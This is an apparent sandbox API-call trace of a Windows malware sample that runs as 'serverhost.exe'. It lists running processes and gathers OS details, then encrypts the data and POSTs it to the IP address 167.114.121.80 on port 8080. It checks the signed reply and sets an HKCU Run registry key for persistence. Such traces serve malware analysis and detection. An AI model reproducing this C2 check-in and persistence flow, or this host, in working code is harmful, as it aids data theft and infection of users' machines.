pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0128.181] GetCurrentProcessId () returned 0x73c [0128.181] lstrcpyW (in: lpString1=0x1b4c24, lpString2="taskhost.exe" | out: lpString1="taskhost.exe") returned="taskhost.exe" [0128.181] Process32NextW (in: hSnapshot=0x180, lppe=0x1e3f8c4 | out: lppe=0x1e3f8c4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.182] GetCurrentProcessId () returned 0x73c [0128.182] Process32NextW (in: hSnapshot=0x180, lppe=0x1e3f8c4 | out: lppe=0x1e3f8c4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0128.182] GetCurrentProcessId () returned 0x73c [0128.182] lstrcpyW (in: lpString1=0x1b4e3c, lpString2="userinit.exe" | out: lpString1="userinit.exe") returned="userinit.exe" [0128.182] Process32NextW (in: hSnapshot=0x180, lppe=0x1e3f8c4 | out: lppe=0x1e3f8c4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x340, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0128.183] GetCurrentProcessId () returned 0x73c [0128.183] lstrcpyW (in: lpString1=0x1b5054, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0128.183] Process32NextW (in: hSnapshot=0x180, lppe=0x1e3f8c4 | out: lppe=0x1e3f8c4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x600, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x5c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0128.183] GetCurrentProcessId () returned 0x73c [0128.183] lstrcpyW (in: lpString1=0x1b526c, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0128.183] Process32NextW (in: hSnapshot=0x180, lppe=0x1e3f8c4 | out: lppe=0x1e3f8c4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x368, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0128.184] GetCurrentProcessId () returned 0x73c [0128.184] lstrcpyW (in: lpString1=0x1b549c, lpString2="taskeng.exe" | out: lpString1="taskeng.exe") returned="taskeng.exe" [0128.184] Process32NextW (in: hSnapshot=0x180, lppe=0x1e3f8c4 | out: lppe=0x1e3f8c4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x600, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0128.184] GetCurrentProcessId () returned 0x73c [0128.184] lstrcpyW (in: lpString1=0x1b56c4, lpString2="reader_sl.exe" | out: lpString1="reader_sl.exe") returned="reader_sl.exe" [0128.184] Process32NextW (in: hSnapshot=0x180, lppe=0x1e3f8c4 | out: lppe=0x1e3f8c4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x73c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x744, pcPriClassBase=8, dwFlags=0x0, szExeFile="serverhost.exe")) returned 1 [0128.185] GetCurrentProcessId () returned 0x73c [0128.185] lstrcpyW (in: lpString1=0x1b58ec, lpString2="serverhost.exe" | out: lpString1="serverhost.exe") returned="serverhost.exe" [0128.185] Process32NextW (in: hSnapshot=0x180, lppe=0x1e3f8c4 | out: lppe=0x1e3f8c4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0128.185] GetCurrentProcessId () returned 0x73c [0128.185] Process32NextW (in: hSnapshot=0x180, lppe=0x1e3f8c4 | out: lppe=0x1e3f8c4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 0 [0128.186] CloseHandle (hObject=0x180) returned 1 [0128.186] lstrlenW (lpString="serverhost.exe") returned 14 [0128.186] lstrlenW (lpString="reader_sl.exe") returned 13 [0128.186] lstrlenW (lpString="taskeng.exe") returned 11 [0128.186] lstrlenW (lpString="explorer.exe") returned 12 [0128.186] lstrlenW (lpString="dwm.exe") returned 7 [0128.186] lstrlenW (lpString="userinit.exe") returned 12 [0128.186] lstrlenW (lpString="taskhost.exe") returned 12 [0128.186] lstrlenW (lpString="spoolsv.exe") returned 11 [0128.186] lstrlenW (lpString="audiodg.exe") returned 11 [0128.186] lstrlenW (lpString="svchost.exe") returned 11 [0128.186] lstrlenW (lpString="lsm.exe") returned 7 [0128.186] lstrlenW (lpString="lsass.exe") returned 9 [0128.186] lstrlenW (lpString="services.exe") returned 12 [0128.186] lstrlenW (lpString="winlogon.exe") returned 12 [0128.186] lstrlenW (lpString="wininit.exe") returned 11 [0128.186] lstrlenW (lpString="csrss.exe") returned 9 [0128.186] lstrlenW (lpString="smss.exe") returned 8 [0128.186] lstrlenW (lpString="System") returned 6 [0128.186] lstrlenW (lpString="[System Process]") returned 16 [0128.186] lstrcmpiW (lpString1="serverhost.exe", lpString2="serverhost.exe") returned 0 [0128.186] lstrcmpiW (lpString1="reader_sl.exe", lpString2="serverhost.exe") returned -1 [0128.186] lstrcpyW (in: lpString1=0x1b9480, lpString2="reader_sl.exe" | out: lpString1="reader_sl.exe") returned="reader_sl.exe" [0128.186] lstrlenW (lpString="reader_sl.exe") returned 13 [0128.186] lstrcmpiW (lpString1="taskeng.exe", lpString2="serverhost.exe") returned 1 [0128.186] lstrcpyW (in: lpString1=0x1b949c, lpString2="taskeng.exe" | out: lpString1="taskeng.exe") returned="taskeng.exe" [0128.186] lstrlenW (lpString="taskeng.exe") returned 11 [0128.186] lstrcmpiW (lpString1="explorer.exe", lpString2="serverhost.exe") returned -1 [0128.186] lstrcpyW (in: lpString1=0x1b94b4, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0128.186] lstrlenW (lpString="explorer.exe") returned 12 [0128.186] lstrcmpiW (lpString1="dwm.exe", lpString2="serverhost.exe") returned -1 [0128.187] lstrcpyW (in: lpString1=0x1b94ce, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0128.187] lstrlenW (lpString="dwm.exe") returned 7 [0128.187] lstrcmpiW (lpString1="userinit.exe", lpString2="serverhost.exe") returned 1 [0128.187] lstrcpyW (in: lpString1=0x1b94de, lpString2="userinit.exe" | out: lpString1="userinit.exe") returned="userinit.exe" [0128.187] lstrlenW (lpString="userinit.exe") returned 12 [0128.187] lstrcmpiW (lpString1="taskhost.exe", lpString2="serverhost.exe") returned 1 [0128.187] lstrcpyW (in: lpString1=0x1b94f8, lpString2="taskhost.exe" | out: lpString1="taskhost.exe") returned="taskhost.exe" [0128.187] lstrlenW (lpString="taskhost.exe") returned 12 [0128.187] lstrcmpiW (lpString1="spoolsv.exe", lpString2="serverhost.exe") returned 1 [0128.187] lstrcpyW (in: lpString1=0x1b9512, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0128.187] lstrlenW (lpString="spoolsv.exe") returned 11 [0128.187] lstrcmpiW (lpString1="audiodg.exe", lpString2="serverhost.exe") returned -1 [0128.187] lstrcpyW (in: lpString1=0x1b952a, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0128.187] lstrlenW (lpString="audiodg.exe") returned 11 [0128.187] lstrcmpiW (lpString1="svchost.exe", lpString2="serverhost.exe") returned 1 [0128.187] lstrcpyW (in: lpString1=0x1b9542, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0128.187] lstrlenW (lpString="svchost.exe") returned 11 [0128.187] lstrcmpiW (lpString1="lsm.exe", lpString2="serverhost.exe") returned -1 [0128.187] lstrcpyW (in: lpString1=0x1b955a, lpString2="lsm.exe" | out: lpString1="lsm.exe") returned="lsm.exe" [0128.187] lstrlenW (lpString="lsm.exe") returned 7 [0128.187] lstrcmpiW (lpString1="lsass.exe", lpString2="serverhost.exe") returned -1 [0128.187] lstrcpyW (in: lpString1=0x1b956a, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0128.187] lstrlenW (lpString="lsass.exe") returned 9 [0128.187] lstrcmpiW (lpString1="services.exe", lpString2="serverhost.exe") returned 1 [0128.187] lstrcpyW (in: lpString1=0x1b957e, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0128.187] lstrlenW (lpString="services.exe") returned 12 [0128.187] lstrcmpiW (lpString1="winlogon.exe", lpString2="serverhost.exe") returned 1 [0128.187] lstrcpyW (in: lpString1=0x1b9598, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0128.187] lstrlenW (lpString="winlogon.exe") returned 12 [0128.187] lstrcmpiW (lpString1="wininit.exe", lpString2="serverhost.exe") returned 1 [0128.187] lstrcpyW (in: lpString1=0x1b95b2, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0128.187] lstrlenW (lpString="wininit.exe") returned 11 [0128.187] lstrcmpiW (lpString1="csrss.exe", lpString2="serverhost.exe") returned -1 [0128.187] lstrcpyW (in: lpString1=0x1b95ca, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0128.187] lstrlenW (lpString="csrss.exe") returned 9 [0128.187] lstrcmpiW (lpString1="smss.exe", lpString2="serverhost.exe") returned 1 [0128.187] lstrcpyW (in: lpString1=0x1b95de, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0128.187] lstrlenW (lpString="smss.exe") returned 8 [0128.187] lstrcmpiW (lpString1="System", lpString2="serverhost.exe") returned 1 [0128.187] lstrcpyW (in: lpString1=0x1b95f0, lpString2="System" | out: lpString1="System") returned="System" [0128.187] lstrlenW (lpString="System") returned 6 [0128.187] lstrcmpiW (lpString1="[System Process]", lpString2="serverhost.exe") returned -1 [0128.188] lstrcpyW (in: lpString1=0x1b95fe, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0128.188] lstrlenW (lpString="[System Process]") returned 16 [0128.188] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="reader_sl.exe,taskeng.exe,explorer.exe,dwm.exe,userinit.exe,taskhost.exe,spoolsv.exe,audiodg.exe,svchost.exe,lsm.exe,lsass.exe,services.exe,winlogon.exe,wininit.exe,csrss.exe,smss.exe,System,[System Process],", cchWideChar=208, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 208 [0128.188] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="reader_sl.exe,taskeng.exe,explorer.exe,dwm.exe,userinit.exe,taskhost.exe,spoolsv.exe,audiodg.exe,svchost.exe,lsm.exe,lsass.exe,services.exe,winlogon.exe,wininit.exe,csrss.exe,smss.exe,System,[System Process],", cchWideChar=208, lpMultiByteStr=0x1a1ab8, cbMultiByte=208, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="reader_sl.exe,taskeng.exe,explorer.exe,dwm.exe,userinit.exe,taskhost.exe,spoolsv.exe,audiodg.exe,svchost.exe,lsm.exe,lsass.exe,services.exe,winlogon.exe,wininit.exe,csrss.exe,smss.exe,System,[System Process],\x1bx©[", lpUsedDefaultChar=0x0) returned 208 [0128.188] RtlGetVersion (in: lpVersionInformation=0x1e3f9c8 | out: lpVersionInformation=0x1e3f9c8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 0x0 [0128.188] GetNativeSystemInfo (in: lpSystemInfo=0x1e3fae4 | out: lpSystemInfo=0x1e3fae4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0128.188] lstrlenA (lpString="F71GWAT_78B95E2E") returned 16 [0128.199] CryptDuplicateHash (in: hHash=0x1b3200, pdwReserved=0x0, dwFlags=0x0, phHash=0x1e3f9fc | out: phHash=0x1e3f9fc) returned 1 [0128.199] CryptEncrypt (in: hKey=0x1b2f30, hHash=0x1b9918, Final=1, dwFlags=0x0, pbData=0x1b984c*, pdwDataLen=0x1e3f9e4*=0xb3, dwBufLen=0xc0 | out: pbData=0x1b984c*, pdwDataLen=0x1e3f9e4*=0xc0) returned 1 [0128.200] CryptExportKey (in: hKey=0x1b2f30, hExpKey=0x1b2300, dwBlobType=0x1, dwFlags=0x40, pbData=0x1e3f978, pdwDataLen=0x1e3f9e8 | out: pbData=0x1e3f978*, pdwDataLen=0x1e3f9e8*=0x6c) returned 1 [0128.200] CryptGetHashParam (in: hHash=0x1b9918, dwParam=0x2, pbData=0x1b9838, pdwDataLen=0x1e3f9e8, dwFlags=0x0 | out: pbData=0x1b9838, pdwDataLen=0x1e3f9e8) returned 1 [0128.201] CryptDestroyHash (hHash=0x1b9918) returned 1 [0128.201] _snwprintf (in: _Dest=0x1e3fa10, _Count=0x40, _Format="%u.%u.%u.%u" | out: _Dest="167.114.121.80") returned 14 [0128.201] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0x1e3f7ec, cbSize=0x1e3f9ec | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)", cbSize=0x1e3f9ec) returned 0x0 [0128.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1e3f7ec, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 184 [0128.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1e3f7ec, cbMultiByte=-1, lpWideCharStr=0x1b9e50, cchWideChar=184 | out: lpWideCharStr="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)") returned 184 [0128.218] InternetOpenW (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0128.334] InternetConnectW (hInternet=0xcc0004, lpszServerName="167.114.121.80", nServerPort=0x1f90, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0128.349] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName=0x0, lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x844cc300, dwContext=0x0) returned 0xcc000c [0128.350] HttpSendRequestW (in: hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0xffffffff, lpOptional=0x1b97d8*, dwOptionalLength=0x134 | out: lpOptional=0x1b97d8*) returned 1 [0128.985] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x1e3fad8, lpdwBufferLength=0x1e3f9f8, lpdwIndex=0x0 | out: lpBuffer=0x1e3fad8*, lpdwBufferLength=0x1e3f9f8*=0x4, lpdwIndex=0x0) returned 1 [0128.986] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000005, lpBuffer=0x1e3f9e8, lpdwBufferLength=0x1e3f9f0, lpdwIndex=0x0 | out: lpBuffer=0x1e3f9e8*, lpdwBufferLength=0x1e3f9f0*=0x4, lpdwIndex=0x0) returned 1 [0128.986] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1d8500, dwNumberOfBytesToRead=0x94, lpdwNumberOfBytesRead=0x1e3f9ec | out: lpBuffer=0x1d8500*, lpdwNumberOfBytesRead=0x1e3f9ec*=0x94) returned 1 [0128.986] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1d8594, dwNumberOfBytesToRead=0x0, lpdwNumberOfBytesRead=0x1e3f9ec | out: lpBuffer=0x1d8594*, lpdwNumberOfBytesRead=0x1e3f9ec*=0x0) returned 1 [0128.986] CryptDuplicateHash (in: hHash=0x1b3200, pdwReserved=0x0, dwFlags=0x0, phHash=0x1e3f9f0 | out: phHash=0x1e3f9f0) returned 1 [0128.986] CryptDecrypt (in: hKey=0x1b2f30, hHash=0x1c1920, Final=1, dwFlags=0x0, pbData=0x1cc438, pdwDataLen=0x1e3fae8 | out: pbData=0x1cc438, pdwDataLen=0x1e3fae8) returned 1 [0128.987] CryptVerifySignatureW (hHash=0x1c1920, pbSignature=0x1d8500, dwSigLen=0x60, hPubKey=0x1b2300, szDescription=0x0, dwFlags=0x0) returned 1 [0128.987] CryptDestroyHash (hHash=0x1c1920) returned 1 [0128.987] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0128.988] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0128.988] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0128.988] _snwprintf (in: _Dest=0x1e3f8f4, _Count=0x104, _Format="\"%s\"" | out: _Dest="\"C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe\"") returned 73 [0128.988] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x1e3fafc, lpdwDisposition=0x0 | out: phkResult=0x1e3fafc*=0x350, lpdwDisposition=0x0) returned 0x0 [0128.988] RegSetValueExW (in: hKey=0x350, lpValueName="serverhost", Reserved=0x0, dwType=0x1, lpData="\"C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe\"", cbData=0x94 | out: lpData="\"C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe\"") returned 0x0 [0128.988] RegCloseKey (hKey=0x350) returned 0x0 [0128.988] GetLastError () returned 0x0 [0128.988] GetLastError () returned 0x0 [0128.988] GetLastError () returned 0x0 [0128.988] GetLastError () returned 0x0 [0128.988] GetLastError () returned 0x0 [0128.988] GetLastError () returned 0x0 [0128.988] GetLastError () returned 0x0 [0128.988] GetLastError () returned 0x0 [0128.988] GetLastError () returned 0x0 [0128.988] GetLastError () returned 0x0 [0128.988] GetLastError () returned 0x0 [0128.988] GetLastError () returned 0x0 [0128.988] GetLastError () returned 0x0 [0128.988] GetLastError () returned 0x0 [0128.988] GetLastError () returned 0x0 [0128.988] GetLastError () returned 0x0 [0128.988] GetLastError () returned 0x0 [0128.988] GetLastError () returned 0x0 [0128.988] GetLastError () returned 0x0 [0128.989] GetLastError () returned 0x0 [0128.989] GetLastError () returned 0x0 [0128.989] GetLastError () returned 0x0 [0128.989] GetLastError () returned 0x0 [0128.989] GetLastError () returned 0x0 [0128.989] GetLastError () returned 0x0 [0128.989] GetLastError () returned 0x0 [0128.989] GetLastError () returned 0x0 [0128.989] GetLastError () returned 0x0 [0128.989] GetLastError () returned 0x0 [0128.989] GetLastError () returned 0x0 [0128.989] GetLastError () returned 0x0 [0128.989] GetLastError () returned 0x0 [0128.989] GetLastError () returned 0x0 [0128.989] GetLastError () returned 0x0 [0128.989] GetLastError () returned 0x0 [0128.989] GetLastError () returned 0x0 [0128.989] GetLastError () returned 0x0 [0128.989] GetLastError () returned 0x0 [0128.989] GetLastError () returned 0x0 [0128.989] GetLastError () returned 0x0 [0128.989] GetLastError () returned 0x0 [0128.989] GetLastError () returned 0x0 [0128.989] GetLastError () returned 0x0 [0128.989] GetLastError () returned 0x0 [0128.989] GetLastError () returned 0x0 [0128.989] GetLastError () returned 0x0 [0128.989] GetLastError () returned 0x0 [0128.989] GetLastError () returned 0x0 [0128.989] GetLastError () returned 0x0 [0128.989] GetLastError () returned 0x0 [0128.989] GetLastError () returned 0x0 [0128.989] GetLastError () returned 0x0 [0128.989] GetLastError () returned 0x0 [0128.989] GetLastError () returned 0x0 [0128.989] GetLastError () returned 0x0 [0128.989] GetLastError () returned 0x0 [0128.989] GetLastError () returned 0x0 [0128.989] GetLastError () returned 0x0 [0128.989] GetLastError () returned 0x0 [0128.989] GetLastError () returned 0x0 [0128.989] GetLastError () returned 0x0 [0128.989] GetLastError () returned 0x0 [0128.989] GetLastError () returned 0x0 [0128.989] GetLastError () returned 0x0 [0128.989] GetLastError () returned 0x0 [0128.989] GetLastError () returned 0x0 [0128.989] GetLastError () returned 0x0 [0128.989] GetLastError () returned 0x0 [0128.989] GetLastError () returned 0x0 [0128.989] GetLastError () returned 0x0 [0128.989] GetLastError () returned 0x0 [0128.989] GetLastError () returned 0x0 [0128.990] GetLastError () returned 0x0 [0128.990] GetLastError () returned 0x0 [0128.990] GetLastError () returned 0x0 [0128.990] GetLastError () returned 0x0 [0128.990] GetLastError () returned 0x0 [0128.990] GetLastError () returned 0x0 [0128.990] GetLastError () returned 0x0 [0128.990] GetLastError () returned 0x0 [0128.990] GetLastError () returned 0x0 [0128.990] GetLastError () returned 0x0 [0128.990] GetLastError () returned 0x0 [0128.990] GetLastError () returned 0x0 [0128.990] GetLastError () returned 0x0 [0128.990] GetLastError () returned 0x0 [0128.990] GetLastError () returned 0x0 [0128.990] GetLastError () returned 0x0 [0128.990] GetLastError () returned 0x0 [0128.990] GetLastError () returned 0x0 [0128.990] GetLastError () returned 0x0 [0128.990] GetLastError () returned 0x0 [0128.990] GetLastError () returned 0x0 [0128.990] GetLastError () returned 0x0 [0128.990] GetLastError () returned 0x0 [0128.990] GetLastError () returned 0x0 [0128.990] GetLastError () returned 0x0 [0128.990] GetLastError () returned 0x0 [0128.990] GetLastError () returned 0x0 [0128.990] GetLastError () returned 0x0 [0128.990] GetLastError () returned 0x0 [0128.990] GetLastError () returned 0x0 [0128.990] GetLastError () returned 0x0 [0128.990] GetLastError () returned 0x0 [0128.990] GetLastError () returned 0x0 [0128.990] GetLastError () returned 0x0 [0128.990] GetLastError () returned 0x0 [0128.990] GetLastError () returned 0x0 [0128.990] GetLastError () returned 0x0 [0128.990] GetLastError () returned 0x0 [0128.990] GetLastError () returned 0x0 [0128.990] GetLastError () returned 0x0 [0128.990] GetLastError () returned 0x0 [0128.990] GetLastError () returned 0x0 [0128.990] GetLastError () returned 0x0 [0128.990] GetLastError () returned 0x0 [0128.990] GetLastError () returned 0x0 [0128.990] GetLastError () returned 0x0 [0128.990] GetLastError () returned 0x0 [0128.990] GetLastError () returned 0x0 [0128.990] GetLastError () returned 0x0 [0128.990] GetLastError () returned 0x0 [0128.990] GetLastError () returned 0x0 [0128.990] GetLastError () returned 0x0 [0128.990] GetLastError () returned 0x0 [0128.990] GetLastError () returned 0x0 [0128.990] GetLastError () returned 0x0 [0128.990] GetLastError () returned 0x0 [0128.991] GetLastError () returned 0x0 [0128.991] GetLastError () returned 0x0 [0128.991] GetLastError () returned 0x0 [0128.991] GetLastError () returned 0x0 [0128.991] GetLastError () returned 0x0 [0128.991] GetLastError () returned 0x0 [0128.991] GetLastError () returned 0x0 [0128.991] GetLastError () returned 0x0 [0128.991] GetLastError () returned 0x0 [0128.991] GetLastError () returned 0x0 [0128.991] GetLastError () returned 0x0 [0128.991] GetLastError () returned 0x0 [0128.991] GetLastError () returned 0x0 [0128.991] GetLastError () returned 0x0 [0128.991] GetLastError () returned 0x0 [0128.991] GetLastError () returned 0x0 [0128.991] GetLastError () returned 0x0 [0128.991] GetLastError () returned 0x0 [0128.991] GetLastError () returned 0x0 [0128.991] GetLastError () returned 0x0 [0128.991] GetLastError () returned 0x0 [0128.991] GetLastError () returned 0x0 [0128.991] GetLastError () returned 0x0 [0128.991] GetLastError () returned 0x0 [0128.991] GetLastError () returned 0x0 [0128.991] GetLastError () returned 0x0 [0128.991] GetLastError () returned 0x0 [0128.991] GetLastError () returned 0x0 [0128.991] GetLastError () returned 0x0 [0128.991] GetLastError () returned 0x0 [0128.991] GetLastError () returned 0x0 [0128.991] GetLastError () returned 0x0 [0128.991] GetLastError () returned 0x0 [0128.991] GetLastError () returned 0x0 [0128.991] GetLastError () returned 0x0 [0128.991] GetLastError () returned 0x0 [0128.991] GetLastError () returned 0x0 [0128.991] GetLastError () returned 0x0 [0128.991] GetLastError () returned 0x0 [0128.991] GetLastError () returned 0x0 [0128.991] GetLastError () returned 0x0 [0128.991] GetLastError () returned 0x0 [0128.991] GetLastError () returned 0x0 [0128.991] GetLastError () returned 0x0 [0128.991] GetLastError () returned 0x0 [0128.991] GetLastError () returned 0x0 [0128.991] GetLastError () returned 0x0 [0128.991] GetLastError () returned 0x0 [0128.991] GetLastError () returned 0x0 [0128.991] GetLastError () returned 0x0 [0128.991] GetLastError () returned 0x0 [0128.991] GetLastError () returned 0x0 [0128.991] GetLastError () returned 0x0 [0128.991] GetLastError () returned 0x0 [0128.992] GetLastError () returned 0x0 [0128.992] GetLastError () returned 0x0 [0128.992] GetLastError () returned 0x0 [0128.992] GetLastError () returned 0x0 [0128.992] GetLastError () returned 0x0 [0128.992] GetLastError () returned 0x0 [0128.992] GetLastError () returned 0x0 [0128.992] GetLastError () returned 0x0 [0128.992] GetLastError () returned 0x0 [0128.992] GetLastError () returned 0x0 [0128.992] GetLastError () returned 0x0 [0128.992] GetLastError () returned 0x0 [0128.992] GetLastError () returned 0x0 [0128.992] GetLastError () returned 0x0 [0128.992] GetLastError () returned 0x0 [0128.992] GetLastError () returned 0x0 [0128.992] GetLastError () returned 0x0 [0128.992] GetLastError () returned 0x0 [0128.992] GetLastError () returned 0x0 [0128.992] GetLastError () returned 0x0 [0128.992] GetLastError () returned 0x0 [0128.992] GetLastError () returned 0x0 [0128.992] GetLastError () returned 0x0 [0128.992] GetLastError () returned 0x0 [0128.992] GetLastError () returned 0x0 [0128.992] GetLastError () returned 0x0 [0128.992] GetLastError () returned 0x0 [0128.992] GetLastError () returned 0x0 [0128.992] GetLastError () returned 0x0 [0128.992] GetLastError () returned 0x0 [0128.992] GetLastError () returned 0x0 [0128.992] GetLastError () returned 0x0 [0128.992] GetLastError () returned 0x0 [0128.992] GetLastError () returned 0x0 [0128.992] GetLastError () returned 0x0 [0128.992] GetLastError () returned 0x0 [0128.992] GetLastError () returned 0x0 [0128.992] GetLastError () returned 0x0 [0128.992] GetLastError () returned 0x0 [0128.992] GetLastError () returned 0x0 [0128.992] GetLastError () returned 0x0 [0128.992] GetLastError () returned 0x0 [0128.992] GetLastError () returned 0x0 [0128.992] GetLastError () returned 0x0 [0128.992] GetLastError () returned 0x0 [0128.992] GetLastError () returned 0x0 [0128.992] GetLastError () returned 0x0 [0128.992] GetLastError () returned 0x0 [0128.992] GetLastError () returned 0x0 [0128.992] GetLastError () returned 0x0 [0128.992] GetLastError () returned 0x0 [0128.992] GetLastError () returned 0x0 [0128.992] GetLastError () returned 0x0 [0128.992] GetLastError () returned 0x0 [0128.992] GetLastError () returned 0x0 [0128.993] GetLastError () returned 0x0 [0128.993] GetLastError () returned 0x0 [0128.993] GetLastError () returned 0x0 [0128.993] GetLastError () returned 0x0 [0128.993] GetLastError () returned 0x0 [0128.993] GetLastError () returned 0x0 [0128.993] GetLastError () returned 0x0 [0128.993] GetLastError () returned 0x0 [0128.993] GetLastError () returned 0x0 [0128.993] GetLastError () returned 0x0 [0128.993] GetLastError () returned 0x0 [0128.993] GetLastError () returned 0x0 [0129.242] GetTickCount () returned 0x69c9 [0129.243] GetTickCount () returned 0x69c9 [0130.166] GetTickCount () returned 0x6d71 [0131.164] GetTickCount () returned 0x7158 [0132.162] GetTickCount () returned 0x753e [0133.161] GetTickCount () returned 0x7924 [0134.175] GetTickCount () returned 0x7d1b [0135.173] GetTickCount () returned 0x8101 [0136.172] GetTickCount () returned 0x84e7 [0137.170] GetTickCount () returned 0x88ce [0138.169] GetTickCount () returned 0x8cb4 [0139.173] GetTickCount () returned 0x909b [0140.165] GetTickCount () returned 0x9481 [0141.188] GetTickCount () returned 0x9877 [0142.162] GetTickCount () returned 0x9c4e [0143.160] GetTickCount () returned 0xa034 [0144.174] GetTickCount () returned 0xa42a [0145.173] GetTickCount () returned 0xa811 Thread: id = 109 os_tid = 0x338 